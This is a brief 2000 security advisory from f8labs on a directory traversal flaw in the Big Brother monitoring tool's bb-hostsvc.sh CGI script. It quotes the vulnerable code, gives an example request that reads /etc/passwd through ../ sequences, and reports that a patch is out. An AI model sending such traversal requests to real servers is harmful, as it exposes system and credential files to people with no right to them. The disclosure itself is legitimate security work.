

    -----------------.---------------------------------------------.
  /|                 |                             .               |
 / | :               : :             : :             :             |
|  | ::        ------  ::            : ::          | ::     -      |-----
|  | ::              : ::     .      :      |      | ::            :     |
|  |                 :        .      |------|      |               :     |
|  |           ------^        :      |     /       |                     .
|  ;----------"---------------^------     /  ------'---------------------
| /          /               /      /----'        /                     /
|'----------'---------------'------'     --------'---------------------'
                                www.f8labs.com














[ INTRODUCTION ]


Advisory .........: Big Brother Technologies
Release Date .....: 07-14-00
Application ......: /cgi-bin/bb-hostsvc.sh
Vendor Web Site ..: www.bb4.com
Versions Affected.: All versions prior to and including v1.4h
Vendor Status ....: Contacted / New version released
WWW ..............: www.f8labs.com




           


[ OVERVIEW ]
         
View the contents of any file on the remote system. Including 
/etc/passwd or /etc/shadow




The problem exists in the code where $HOSTSVC does not do authenticity
checking for its assigned variable.


---- snip ----
# get the color of the status from the status file
set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1 BKG="$1"
---- snap ----


e.g. http://www.target.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd


BB4 Technologies has already been notified and a patch is already out.
It can be Downloaded from http://www.bb4.com/download.html




